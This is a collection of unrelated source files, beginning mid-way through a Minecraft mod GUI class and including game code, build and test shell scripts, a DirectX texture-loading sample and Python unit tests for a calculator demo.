PacketHandler.INSTANCE.sendToServer(new MessageButton(basicSteamMachine.xCoord, basicSteamMachine.yCoord, basicSteamMachine.zCoord, 0));
break;
case high:
buttonRedStone.setMode(RedstoneMode.disabled);
basicSteamMachine.setRedstoneMode(RedstoneMode.disabled);
PacketHandler.INSTANCE.sendToServer(new MessageButton(basicSteamMachine.xCoord, basicSteamMachine.yCoord, basicSteamMachine.zCoord, 1));
break;
case disabled:
buttonRedStone.setMode(RedstoneMode.low);
basicSteamMachine.setRedstoneMode(RedstoneMode.low);
PacketHandler.INSTANCE.sendToServer(new MessageButton(basicSteamMachine.xCoord, basicSteamMachine.yCoord, basicSteamMachine.zCoord, 2));
break;
}
break;
}
}
}
}
@Override
public void handleMouseInput() {
super.handleMouseInput();
// Convert raw screen mouse coordinates into GUI-local coordinates.
int x = Mouse.getEventX() * this.width / this.mc.displayWidth;
int y = this.height - Mouse.getEventY() * this.height / this.mc.displayHeight - 1;
mouseX = x - guiLeft;
mouseY = y - guiTop;
}
// Draws a rect from the currently-bound texture at GUI-local coordinates.
public void drawElement(int x, int y, int u, int v, int width, int height) {
this.drawTexturedModalRect(guiLeft + x, guiTop + y, u, v, width, height);
}
// Integer-scales value/max onto [0, scale] (e.g. for progress bars).
public int getValueScaled(int value, int max, int scale) {
return (value * scale) / max;
}
// Shows the hover tooltip when the mouse is inside the given rectangle.
public void drawToolTipOverArea(int mouseX, int mouseY, int minX, int minY, int maxX, int maxY, List<String> list, FontRenderer font) {
if (list != null && font != null) {
if ((mouseX >= minX && mouseX <= maxX) && (mouseY >= minY && mouseY <= maxY))
drawHoveringText(list, mouseX, mouseY, font);
}
}
// Draws a tank's fluid column; the column grows upward from y as the tank fills.
public void drawTank(FluidTank tank, int scale, int x, int y, int width) {
int j;
if (tank.getFluid() != null) {
j = getValueScaled(tank.getFluidAmount(), tank.getCapacity(), scale);
this.drawFluid(guiLeft + x, guiTop + y - j, tank.getFluid(), width, j);
}
}
// Tints the block atlas with the fluid's color and tiles its icon over the area.
public void drawFluid(int x, int y, FluidStack fluid, int width, int height) {
if (fluid == null || fluid.getFluid() == null)
return;
mc.renderEngine.bindTexture(new ResourceLocation("textures/atlas/blocks.png"));
GL11.glColor3ub((byte) (fluid.getFluid().getColor() >> 16 & 0xFF), (byte) (fluid.getFluid().getColor() >> 8 & 0xFF), (byte) (fluid.getFluid().getColor() & 0xFF));
drawTiledTexture(x, y, fluid.getFluid().getIcon(fluid), width, height);
}
// Fills a width x height area with 16x16 tiles of the icon, clipping the
// final row/column to the remaining size.
public void drawTiledTexture(int x, int y, IIcon icon, int width, int height) {
int i = 0;
int j = 0;
int drawHeight = 0;
int drawWidth = 0;
for (i = 0; i < width; i += 16) {
for (j = 0; j < height; j += 16) {
drawWidth = (width - i) < 16 ? (width - i) : 16;
drawHeight = (height - j) < 16 ? (height - j) : 16;
drawScaledTexturedModelRectFromIcon(x + i, y + j, icon, drawWidth, drawHeight);
}
}
GL11.glColor4f(1f, 1f, 1f, 1F);
}
// Draws a sub-rectangle of an icon, scaling the UVs for partial (clipped) tiles.
public void drawScaledTexturedModelRectFromIcon(int x, int y, IIcon icon, int width, int height) {
if (icon == null)
return;
double minU = icon.getMinU();
double maxU = icon.getMaxU();
double minV = icon.getMinV();
double maxV = icon.getMaxV();
Tessellator tessellator = Tessellator.instance;
tessellator.startDrawingQuads();
tessellator.addVertexWithUV(x, y + height, this.zLevel, minU, minV + (maxV - minV) * height / 16F);
tessellator.addVertexWithUV(x + width, y + height, this.zLevel, minU + (maxU - minU) * width / 16F, minV + (maxV - minV) * height / 16F);
tessellator.addVertexWithUV(x + width, y, this.zLevel, minU + (maxU - minU) * width / 16F, minV);
tessellator.addVertexWithUV(x, y, this.zLevel, minU, minV);
tessellator.draw();
}
}
|
<gh_stars>0
/**
 * A tile layer built from Tiled-style map data: iterates the flat `data`
 * array row by row and materializes a Tile (or null for empty cells) per
 * position. Leftover debug console.log calls and large blocks of dead
 * commented-out code have been removed.
 */
class CapaMapaTiles {
    /**
     * @param datosCapa      raw layer data: width/height/x/y plus a flat `data`
     *                       array of 1-based sprite ids (0 = empty)
     * @param indiceZ        z-order index of this layer
     * @param anchoTiles     tile width in pixels
     * @param altoTiles      tile height in pixels
     * @param paletasSprites sprite palettes used to resolve sprite ids
     */
    constructor(datosCapa, indiceZ, anchoTiles, altoTiles, paletasSprites) {
        this.anchoEnTiles = parseInt(datosCapa.width);
        this.altoEnTiles = parseInt(datosCapa.height);
        this.x = parseInt(datosCapa.x);
        this.y = parseInt(datosCapa.y);
        this.z = indiceZ;
        this.tiles = [];
        for (let y = 0; y < this.altoEnTiles; y++) {
            for (let x = 0; x < this.anchoEnTiles; x++) {
                const idSprite = datosCapa.data[x + y * this.anchoEnTiles];
                if (idSprite === 0) {
                    // Id 0 marks an empty cell in the map data.
                    this.tiles.push(null);
                } else {
                    // Map ids are 1-based; sprite lookup below is 0-based.
                    const spriteActual = this.encontrarSpritePaletaId(idSprite - 1, paletasSprites);
                    this.tiles.push(new Tile(x, y, indiceZ, anchoTiles, altoTiles, spriteActual));
                }
            }
        }
    }

    /**
     * Finds the sprite for a 0-based sprite id across the palettes.
     * Returns undefined when no palette contains the id.
     */
    encontrarSpritePaletaId(idSprite, paletaSprites) {
        for (let s = 0; s < paletaSprites.length; s++) {
            const paleta = paletaSprites[s];
            // NOTE(review): the upper bound keeps the original "+ 1", which also
            // accepts ids just past the palette's range — confirm against the
            // map data before tightening.
            if (idSprite >= paleta.primerSpriteSobreUno - 1 &&
                idSprite < paleta.totalSprites + paleta.primerSpriteSobreUno + 1) {
                return paleta.sprites[Math.abs(paleta.primerSpriteSobreUno - 1 - idSprite)];
            }
        }
    }
}
<gh_stars>0
package HexaGhost;
import java.util.concurrent.ThreadLocalRandom;
import Model.Cell;
/**
 * Defensive strategy for HexaGhost: scores every free cell with the ghost's
 * evaluation function (attack flag off) and plays the best one.
 */
public class HGDefense implements HGStrategy {

    private HexaGhost hexaghost;

    public HGDefense(HexaGhost hexaghost) {
        this.hexaghost = hexaghost;
    }

    /**
     * @return the first free cell with the maximum defensive value, or null
     *         when there are no free cells
     */
    @Override
    public Cell play() {
        Cell best = null;
        int bestValue = Integer.MIN_VALUE;
        for (Cell candidate : hexaghost.getFreeCells()) {
            int candidateValue = hexaghost.cellValue(candidate.getX(), candidate.getY(), false);
            // Strict comparison keeps the earliest cell on ties, as before.
            if (candidateValue > bestValue) {
                bestValue = candidateValue;
                best = candidate;
            }
        }
        return best;
    }
}
|
# Compile each kiflash core source to a position-independent object file.
sudo gcc -pthread -fPIC -fno-strict-aliasing -g -O2 -DNDEBUG -g -fwrapv -O3 -Wall -Wstrict-prototypes -I. -IInclude -I./Include -I/usr/include/x86_64-linux-gnu -I/usr/local/include -I/home/ixiaadmin/git/kiflashcore/src -c /home/ixiaadmin/git/kiflash/kiflashcore/src/pcimem.c -o build/pcimem.o
sudo gcc -pthread -fPIC -fno-strict-aliasing -g -O2 -DNDEBUG -g -fwrapv -O3 -Wall -Wstrict-prototypes -I. -IInclude -I./Include -I/usr/include/x86_64-linux-gnu -I/usr/local/include -I/home/ixiaadmin/git/kiflashcore/src -c /home/ixiaadmin/git/kiflash/kiflashcore/src/xspi_sinit.c -o build/xspi_sinit.o
sudo gcc -pthread -fPIC -fno-strict-aliasing -g -O2 -DNDEBUG -g -fwrapv -O3 -Wall -Wstrict-prototypes -I. -IInclude -I./Include -I/usr/include/x86_64-linux-gnu -I/usr/local/include -I/home/ixiaadmin/git/kiflashcore/src -c /home/ixiaadmin/git/kiflash/kiflashcore/src/xspi_options.c -o build/xspi_options.o
sudo gcc -pthread -fPIC -fno-strict-aliasing -g -O2 -DNDEBUG -g -fwrapv -O3 -Wall -Wstrict-prototypes -I. -IInclude -I./Include -I/usr/include/x86_64-linux-gnu -I/usr/local/include -I/home/ixiaadmin/git/kiflashcore/src -c /home/ixiaadmin/git/kiflash/kiflashcore/src/xspi_g.c -o build/xspi_g.o
sudo gcc -pthread -fPIC -fno-strict-aliasing -g -O2 -DNDEBUG -g -fwrapv -O3 -Wall -Wstrict-prototypes -I. -IInclude -I./Include -I/usr/include/x86_64-linux-gnu -I/usr/local/include -I/home/ixiaadmin/git/kiflashcore/src -c /home/ixiaadmin/git/kiflash/kiflashcore/src/xspi.c -o build/xspi.o
sudo gcc -pthread -fPIC -fno-strict-aliasing -g -O2 -DNDEBUG -g -fwrapv -O3 -Wall -Wstrict-prototypes -I. -IInclude -I./Include -I/usr/include/x86_64-linux-gnu -I/usr/local/include -I/home/ixiaadmin/git/kiflashcore/src -c /home/ixiaadmin/git/kiflash/kiflashcore/src/flash_qspi_rw.c -o build/flash_qspi_rw.o
# Link all objects into the shared library and install it next to the other
# Linux binaries.
sudo gcc -pthread -shared build/pcimem.o build/xspi_sinit.o build/xspi_options.o build/xspi_g.o build/xspi.o build/flash_qspi_rw.o -L/usr/lib/x86_64-linux-gnu -L/usr/local/lib -o libFlashProvider.so
sudo cp *.so ../../bin/Linux
|
<reponame>billionare/FPSLighting
//--------------------------------------------------------------------------------------
// File: DDSWithoutD3DX9.cpp
//
// Illustrates loading a DDS file without using D3DX
//
// Copyright (c) Microsoft Corporation. All rights reserved.
//--------------------------------------------------------------------------------------
#include "DXUT.h"
#include "DXUTgui.h"
#include "DXUTmisc.h"
#include "DXUTCamera.h"
#include "DXUTSettingsDlg.h"
#include "SDKmisc.h"
#include "SDKmesh.h"
#include "resource.h"
#include "DDSTextureLoader.h"
//--------------------------------------------------------------------------------------
// Global variables
//--------------------------------------------------------------------------------------
extern CModelViewerCamera g_Camera; // A model viewing camera
extern CDXUTDialogResourceManager g_DialogResourceManager; // manager for shared resources of dialogs
extern CD3DSettingsDlg g_SettingsDlg; // Device settings dialog
extern CDXUTTextHelper* g_pTxtHelper;
extern CDXUTDialog g_HUD; // dialog for standard controls
extern CDXUTDialog g_SampleUI; // dialog for sample specific controls
extern CDXUTSDKMesh g_Mesh; // mesh object
// Direct3D 9 resources
ID3DXFont* g_pFont9 = NULL;                  // font for on-screen stats text
ID3DXSprite* g_pSprite9 = NULL;              // sprite used by the text helper
ID3DXEffect* g_pEffect9 = NULL;              // effect compiled from DDSWithoutD3DX.fx
IDirect3DVertexDeclaration9* g_pDecl9 = NULL; // vertex layout: position/normal/texcoord
IDirect3DTexture9* g_pTexture9 = NULL;       // diffuse texture loaded via CreateDDSTextureFromFile
D3DXHANDLE g_hRenderScene;                   // cached handle to the "RenderScene" technique
D3DXHANDLE g_hmWorld;                        // cached handle to g_mWorld
D3DXHANDLE g_hmWorldViewProjection;          // cached handle to g_mWorldViewProjection
D3DXHANDLE g_htxDiffuse;                     // cached handle to g_txDiffuse
#define IDC_LOAD_TEXTURE 4                   // id of the "load texture" UI control
//--------------------------------------------------------------------------------------
// Forward declarations
//--------------------------------------------------------------------------------------
bool CALLBACK IsD3D9DeviceAcceptable( D3DCAPS9* pCaps, D3DFORMAT AdapterFormat, D3DFORMAT BackBufferFormat,
bool bWindowed, void* pUserContext );
HRESULT CALLBACK OnD3D9CreateDevice( IDirect3DDevice9* pd3dDevice, const D3DSURFACE_DESC* pBackBufferSurfaceDesc,
void* pUserContext );
HRESULT CALLBACK OnD3D9ResetDevice( IDirect3DDevice9* pd3dDevice, const D3DSURFACE_DESC* pBackBufferSurfaceDesc,
void* pUserContext );
void CALLBACK OnD3D9FrameRender( IDirect3DDevice9* pd3dDevice, double fTime, float fElapsedTime, void* pUserContext );
void CALLBACK OnD3D9LostDevice( void* pUserContext );
void CALLBACK OnD3D9DestroyDevice( void* pUserContext );
extern void RenderText();
//--------------------------------------------------------------------------------------
// Rejects any D3D9 devices that aren't acceptable to the app by returning false
//--------------------------------------------------------------------------------------
bool CALLBACK IsD3D9DeviceAcceptable( D3DCAPS9* pCaps, D3DFORMAT AdapterFormat,
                                      D3DFORMAT BackBufferFormat, bool bWindowed, void* pUserContext )
{
    // The sample has no fixed-function fallback, so a device is acceptable
    // only if it supports at least pixel shader model 2.0.
    return pCaps->PixelShaderVersion >= D3DPS_VERSION( 2, 0 );
}
//--------------------------------------------------------------------------------------
// Create any D3D9 resources that will live through a device reset (D3DPOOL_MANAGED)
// and aren't tied to the back buffer size
//--------------------------------------------------------------------------------------
HRESULT CALLBACK OnD3D9CreateDevice( IDirect3DDevice9* pd3dDevice, const D3DSURFACE_DESC* pBackBufferSurfaceDesc,
                                     void* pUserContext )
{
    HRESULT hr;
    V_RETURN( g_DialogResourceManager.OnD3D9CreateDevice( pd3dDevice ) );
    V_RETURN( g_SettingsDlg.OnD3D9CreateDevice( pd3dDevice ) );
    // Font used for the on-screen stats text.
    V_RETURN( D3DXCreateFont( pd3dDevice, 15, 0, FW_BOLD, 1, FALSE, DEFAULT_CHARSET,
                              OUT_DEFAULT_PRECIS, DEFAULT_QUALITY, DEFAULT_PITCH | FF_DONTCARE,
                              L"Arial", &g_pFont9 ) );
    // Read the D3DX effect file
    WCHAR str[MAX_PATH];
    DWORD dwShaderFlags = D3DXFX_NOT_CLONEABLE | D3DXFX_LARGEADDRESSAWARE;
#ifdef DEBUG_VS
    dwShaderFlags |= D3DXSHADER_FORCE_VS_SOFTWARE_NOOPT;
#endif
#ifdef DEBUG_PS
    dwShaderFlags |= D3DXSHADER_FORCE_PS_SOFTWARE_NOOPT;
#endif
    V_RETURN( DXUTFindDXSDKMediaFileCch( str, MAX_PATH, L"DDSWithoutD3DX.fx" ) );
    V_RETURN( D3DXCreateEffectFromFile( pd3dDevice, str, NULL, NULL, dwShaderFlags,
                                        NULL, &g_pEffect9, NULL ) );
    // Cache technique/parameter handles so they aren't looked up every frame.
    g_hRenderScene = g_pEffect9->GetTechniqueByName( "RenderScene" );
    g_hmWorld = g_pEffect9->GetParameterByName( NULL, "g_mWorld" );
    g_hmWorldViewProjection = g_pEffect9->GetParameterByName( NULL, "g_mWorldViewProjection" );
    g_htxDiffuse = g_pEffect9->GetParameterByName( NULL, "g_txDiffuse" );
    // Create a decl for the object data. Stream-0 layout: float3 position at
    // offset 0, float3 normal at offset 12, float2 texcoord at offset 24.
    D3DVERTEXELEMENT9 declDesc[] =
    {
        {0, 0, D3DDECLTYPE_FLOAT3, D3DDECLMETHOD_DEFAULT, D3DDECLUSAGE_POSITION, 0},
        {0, 12, D3DDECLTYPE_FLOAT3, D3DDECLMETHOD_DEFAULT, D3DDECLUSAGE_NORMAL, 0},
        {0, 24, D3DDECLTYPE_FLOAT2, D3DDECLMETHOD_DEFAULT, D3DDECLUSAGE_TEXCOORD, 0},
        {0xFF,0,D3DDECLTYPE_UNUSED, 0,0,0}// D3DDECL_END
    };
    V_RETURN( pd3dDevice->CreateVertexDeclaration( declDesc, &g_pDecl9 ) );
    // Setup the camera's view parameters
    D3DXVECTOR3 vecEye( 0.0f, 0.0f, -5.0f );
    D3DXVECTOR3 vecAt ( 0.0f, 0.0f, 0.0f );
    g_Camera.SetViewParams( &vecEye, &vecAt );
    return S_OK;
}
//--------------------------------------------------------------------------------------
// Create any D3D9 resources that won't live through a device reset (D3DPOOL_DEFAULT)
// or that are tied to the back buffer size
//--------------------------------------------------------------------------------------
HRESULT CALLBACK OnD3D9ResetDevice( IDirect3DDevice9* pd3dDevice,
                                    const D3DSURFACE_DESC* pBackBufferSurfaceDesc, void* pUserContext )
{
    HRESULT hr;
    V_RETURN( g_DialogResourceManager.OnD3D9ResetDevice() );
    V_RETURN( g_SettingsDlg.OnD3D9ResetDevice() );
    // Font/effect survive a reset but must be told about it.
    if( g_pFont9 ) V_RETURN( g_pFont9->OnResetDevice() );
    if( g_pEffect9 ) V_RETURN( g_pEffect9->OnResetDevice() );
    // Sprite + text helper are recreated here and torn down in OnD3D9LostDevice.
    V_RETURN( D3DXCreateSprite( pd3dDevice, &g_pSprite9 ) );
    g_pTxtHelper = new CDXUTTextHelper( g_pFont9, g_pSprite9, 15 );
    // Setup the camera's projection parameters
    float fAspectRatio = pBackBufferSurfaceDesc->Width / ( FLOAT )pBackBufferSurfaceDesc->Height;
    g_Camera.SetProjParams( D3DX_PI / 4, fAspectRatio, 0.1f, 1000.0f );
    g_Camera.SetWindow( pBackBufferSurfaceDesc->Width, pBackBufferSurfaceDesc->Height );
    // Dock the HUD/sample UI against the right edge of the new back buffer.
    g_HUD.SetLocation( pBackBufferSurfaceDesc->Width - 170, 0 );
    g_HUD.SetSize( 170, 170 );
    g_SampleUI.SetLocation( pBackBufferSurfaceDesc->Width - 170, pBackBufferSurfaceDesc->Height - 350 );
    g_SampleUI.SetSize( 170, 300 );
    // load the mesh (destroyed again in OnD3D9LostDevice)
    V_RETURN( g_Mesh.Create( pd3dDevice, L"misc\\ball.sdkmesh" ) );
    // Load the texture with the sample's own DDS loader (no D3DX).
    WCHAR str[MAX_PATH];
    V_RETURN( DXUTFindDXSDKMediaFileCch( str, MAX_PATH, L"misc\\seafloor.dds" ) );
    V_RETURN( CreateDDSTextureFromFile( pd3dDevice, str, &g_pTexture9 ) );
    // The "load texture" file dialog only works in windowed mode.
    if( DXUTIsWindowed() )
        g_SampleUI.GetButton( IDC_LOAD_TEXTURE )->SetEnabled( true );
    else
        g_SampleUI.GetButton( IDC_LOAD_TEXTURE )->SetEnabled( false );
    return S_OK;
}
//--------------------------------------------------------------------------------------
// Render the scene using the D3D9 device
//--------------------------------------------------------------------------------------
void CALLBACK OnD3D9FrameRender( IDirect3DDevice9* pd3dDevice, double fTime, float fElapsedTime, void* pUserContext )
{
    HRESULT hr = S_OK;
    // If the settings dialog is being shown, then render it instead of rendering the app's scene
    if( g_SettingsDlg.IsActive() )
    {
        g_SettingsDlg.OnRender( fElapsedTime );
        return;
    }
    // Compose world * view * projection from the current camera state.
    D3DXMATRIX mWorld = *g_Camera.GetWorldMatrix();
    D3DXMATRIX mView = *g_Camera.GetViewMatrix();
    D3DXMATRIX mProj = *g_Camera.GetProjMatrix();
    D3DXMATRIX mWorldViewProjection = mWorld * mView * mProj;
    // Clear the render target and the zbuffer
    V( pd3dDevice->Clear( 0, NULL, D3DCLEAR_TARGET | D3DCLEAR_ZBUFFER, D3DCOLOR_ARGB( 0, 160, 160, 250 ), 1.0f, 0 ) );
    // Render the scene
    if( SUCCEEDED( pd3dDevice->BeginScene() ) )
    {
        // Feed the per-frame effect parameters, then draw the mesh.
        g_pEffect9->SetMatrix( g_hmWorld, &mWorld );
        g_pEffect9->SetMatrix( g_hmWorldViewProjection, &mWorldViewProjection );
        g_pEffect9->SetTexture( g_htxDiffuse, g_pTexture9 );
        pd3dDevice->SetVertexDeclaration( g_pDecl9 );
        g_Mesh.Render( pd3dDevice, g_pEffect9, g_hRenderScene );
        DXUT_BeginPerfEvent( DXUT_PERFEVENTCOLOR, L"HUD / Stats" ); // These events are to help PIX identify what the code is doing
        RenderText();
        V( g_HUD.OnRender( fElapsedTime ) );
        V( g_SampleUI.OnRender( fElapsedTime ) );
        DXUT_EndPerfEvent();
        V( pd3dDevice->EndScene() );
    }
}
//--------------------------------------------------------------------------------------
// Release D3D9 resources created in the OnD3D9ResetDevice callback
//--------------------------------------------------------------------------------------
void CALLBACK OnD3D9LostDevice( void* pUserContext )
{
    g_DialogResourceManager.OnD3D9LostDevice();
    g_SettingsDlg.OnD3D9LostDevice();
    DXUTGetGlobalResourceCache().OnLostDevice();
    // Font/effect are managed-pool and survive; they only get notified.
    if( g_pFont9 ) g_pFont9->OnLostDevice();
    if( g_pEffect9 ) g_pEffect9->OnLostDevice();
    // Everything created in OnD3D9ResetDevice is released here.
    SAFE_RELEASE( g_pSprite9 );
    SAFE_DELETE( g_pTxtHelper );
    g_Mesh.Destroy();
    SAFE_RELEASE( g_pTexture9 );
}
//--------------------------------------------------------------------------------------
// Release D3D9 resources created in the OnD3D9CreateDevice callback
//--------------------------------------------------------------------------------------
void CALLBACK OnD3D9DestroyDevice( void* pUserContext )
{
    g_DialogResourceManager.OnD3D9DestroyDevice();
    g_SettingsDlg.OnD3D9DestroyDevice();
    DXUTGetGlobalResourceCache().OnDestroyDevice();
    // Release the resources created in OnD3D9CreateDevice.
    SAFE_RELEASE( g_pEffect9 );
    SAFE_RELEASE( g_pFont9 );
    SAFE_RELEASE( g_pDecl9 );
}
|
# Repository: seidu626/vumi
from twisted.internet.defer import inlineCallbacks
from vumi.tests.helpers import VumiTestCase
from vumi.application.tests.helpers import ApplicationHelper
from vumi.demos.calculator import CalculatorApp
from vumi.message import TransportUserMessage
class TestCalculatorApp(VumiTestCase):
    """Tests for the CalculatorApp demo worker (menu-driven calculator)."""

    @inlineCallbacks
    def setUp(self):
        # ApplicationHelper wires the worker to fake transports for dispatch.
        self.app_helper = self.add_helper(ApplicationHelper(CalculatorApp))
        self.worker = yield self.app_helper.get_application({})

    @inlineCallbacks
    def test_session_start(self):
        # A new session should be greeted with the operation menu.
        yield self.app_helper.make_dispatch_inbound(
            None, session_event=TransportUserMessage.SESSION_NEW)
        [resp] = yield self.app_helper.wait_for_dispatched_outbound(1)
        self.assertEqual(
            resp['content'],
            'What would you like to do?\n'
            '1. Add\n'
            '2. Subtract\n'
            '3. Multiply')

    @inlineCallbacks
    def test_first_number(self):
        # Choosing a menu option prompts for the first operand.
        yield self.app_helper.make_dispatch_inbound(
            '1', session_event=TransportUserMessage.SESSION_RESUME)
        [resp] = yield self.app_helper.wait_for_dispatched_outbound(1)
        self.assertEqual(resp['content'], 'What is the first number?')

    @inlineCallbacks
    def test_second_number(self):
        # With an action already stored, the next input is the first operand,
        # so the worker asks for the second one.
        self.worker.save_session('+41791234567', {
            'action': 1,
        })
        yield self.app_helper.make_dispatch_inbound(
            '1', session_event=TransportUserMessage.SESSION_RESUME)
        [resp] = yield self.app_helper.wait_for_dispatched_outbound(1)
        self.assertEqual(resp['content'], 'What is the second number?')

    @inlineCallbacks
    def test_action(self):
        # With action and first operand stored, the second operand triggers
        # the calculation and closes the session.
        self.worker.save_session('+41791234567', {
            'action': 0,  # add
            'first_number': 2,
        })
        yield self.app_helper.make_dispatch_inbound(
            '2', session_event=TransportUserMessage.SESSION_RESUME)
        [resp] = yield self.app_helper.wait_for_dispatched_outbound(1)
        self.assertEqual(resp['content'], 'The result is: 4.')
        self.assertEqual(resp['session_event'],
                         TransportUserMessage.SESSION_CLOSE)

    @inlineCallbacks
    def test_invalid_input(self):
        # Non-numeric operand input aborts the session with an error message.
        self.worker.save_session('+41791234567', {
            'action': 0,  # add
        })
        yield self.app_helper.make_dispatch_inbound(
            'not-an-int', session_event=TransportUserMessage.SESSION_RESUME)
        [resp] = yield self.app_helper.wait_for_dispatched_outbound(1)
        self.assertEqual(resp['content'], 'Sorry invalid input!')
        self.assertEqual(resp['session_event'],
                         TransportUserMessage.SESSION_CLOSE)

    @inlineCallbacks
    def test_invalid_action(self):
        # A menu choice that is not a valid option is rejected.
        yield self.app_helper.make_dispatch_inbound(
            'not-an-option', session_event=TransportUserMessage.SESSION_RESUME)
        [resp] = yield self.app_helper.wait_for_dispatched_outbound(1)
        self.assertTrue(
            resp['content'].startswith('Sorry invalid input!'))

    @inlineCallbacks
    def test_user_cancellation(self):
        # Closing the session clears any stored session state.
        self.worker.save_session('+41791234567', {'foo': 'bar'})
        yield self.app_helper.make_dispatch_inbound(
            None, session_event=TransportUserMessage.SESSION_CLOSE)
        self.assertEqual(self.worker.get_session('+41791234567'), {})

    @inlineCallbacks
    def test_none_input_on_session_resume(self):
        # Empty (None) content on resume is treated as invalid input.
        yield self.app_helper.make_dispatch_inbound(
            None, session_event=TransportUserMessage.SESSION_RESUME)
        [resp] = yield self.app_helper.wait_for_dispatched_outbound(1)
        self.assertEqual(resp['content'], 'Sorry invalid input!')
|
#!/bin/bash
# Run a single dieharder RNG test: -d selects the test (11), -g the generator
# (203), and -S pins the seed so the run is reproducible.
dieharder -d 11 -g 203 -S 2328956153
|
#!/usr/bin/env bash
# nbdkit
# Copyright (C) 2017 Red Hat Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Red Hat nor the names of its contributors may be
# used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY RED HAT AND CONTRIBUTORS ''AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
# PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL RED HAT OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
# USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
# OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
pidfile=shebang-python.pid
sockfile=shebang-python.sock
script=$SRCDIR/shebang.py

if test ! -d "$SRCDIR"; then
    echo "$0: could not locate shebang.py"
    exit 1
fi

rm -f $pidfile $sockfile

# Start the plugin in the background; it daemon-writes its PID file.
$script -P $pidfile -U $sockfile -f -v &

# We may have to wait a short time for the pid file to appear.
for i in {1..60}; do
    if test -f $pidfile; then
        break
    fi
    sleep 1
done
if ! test -f $pidfile; then
    echo "$0: PID file was not created"
    exit 1
fi

pid="$(cat $pidfile)"

# Check the process exists. The original relied on the bare command status
# being noticed, but without `set -e` a failure here was silently ignored.
if ! kill -s 0 $pid; then
    echo "$0: process $pid is not running"
    exit 1
fi

# Check the socket was created (and is a socket); fail loudly if not.
if ! test -S $sockfile; then
    echo "$0: $sockfile was not created or is not a socket"
    exit 1
fi

# Kill the process.
kill $pid

# Check the process exits (eventually).
for i in {1..10}; do
    if ! kill -s 0 $pid; then
        break;
    fi
    sleep 1
done
if kill -s 0 $pid; then
    echo "$0: process did not exit after sending a signal"
    exit 1
fi

rm $pidfile $sockfile
|
#!/bin/bash
#
# Copyright (C) 2016 The CyanogenMod Project
# Copyright (C) 2017 The LineageOS Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
set -e

# Required!
DEVICE_COMMON=g4-common
VENDOR=lge

# Load extract_utils and do some sanity checks
MY_DIR="${BASH_SOURCE%/*}"
if [[ ! -d "$MY_DIR" ]]; then MY_DIR="$PWD"; fi

LINEAGE_ROOT="$MY_DIR"/../../..

HELPER="$LINEAGE_ROOT"/vendor/lineage/build/tools/extract_utils.sh
if [ ! -f "$HELPER" ]; then
    echo "Unable to find helper script at $HELPER"
    exit 1
fi
. "$HELPER"

# Initialize the helper for the common part
setup_vendor "$DEVICE_COMMON" "$VENDOR" "$LINEAGE_ROOT" true

# Copyright headers and guards
write_headers "ls991_usu f500_usu h810_usu h811 h812_usu h815 h815_usu h818_usu h819_usu us991_usu vs986_usu"

# Common blobs
write_makefiles "$MY_DIR"/proprietary-files.txt

# We are done with common
write_footers

# DEVICE is expected to be exported by the per-device wrapper script; the
# original silently passed an empty string to setup_vendor when it was unset.
if [ -z "$DEVICE" ]; then
    echo "DEVICE is not set; run this script via the per-device wrapper"
    exit 1
fi

# Initialize the helper for device
setup_vendor "$DEVICE" "$VENDOR" "$LINEAGE_ROOT"

# Copyright headers and guards
write_headers

# The device blobs
write_makefiles "$MY_DIR"/../$DEVICE/proprietary-files.txt

# We are done with device
write_footers
|
#!/bin/bash
# Regenerate the OpenAPI schemas for both the regular and the index servers,
# then fail if either differs from the committed copy.
python -c "from optimade.server.main import app, update_schema; update_schema(app)"
python -c "from optimade.server.main_index import app, update_schema; update_schema(app)"
# jsondiff prints '{}' when the two JSON documents are identical.
diff=$(jsondiff ./openapi/openapi.json ./openapi/local_openapi.json);
index_diff=$(jsondiff ./openapi/index_openapi.json ./openapi/local_index_openapi.json);
if [ ! "$diff" = "{}" ]; then
    echo -e "Generated OpenAPI spec for test server did not match committed version.\nRun 'invoke update-openapijson' and re-commit.\nDiff:\n$diff";
    exit 1;
fi
if [ ! "$index_diff" = "{}" ]; then
    echo -e "Generated OpenAPI spec for Index meta-database did not match committed version.\nRun 'invoke update-openapijson' and re-commit.\nDiff:\n$index_diff";
    exit 1;
fi
|
#!/bin/sh
set -ex
# Cookiecutter post-generation hook: initialise a git repository pointed at
# the project's GitHub remote and set the author identity from the answers.
git init
git remote add origin git@github.com:{{ cookiecutter.github_org }}/{{ cookiecutter.github_project }}.git
git config user.name "{{ cookiecutter.full_name }}"
git config user.email "{{ cookiecutter.email }}"
|
// src/SplayLibrary/Core/DefaultFramebuffer.cpp
#include <SplayLibrary/SplayLibrary.hpp>
#include <SplayLibrary/Private/Private.hpp>
namespace spl
{
    // The default framebuffer is the one owned by the window's rendering
    // context; it simply forwards the window to the base Framebuffer ctor.
    DefaultFramebuffer::DefaultFramebuffer(Window* window) : Framebuffer(window)
    {
    }
}
|
// gh_stars: 0
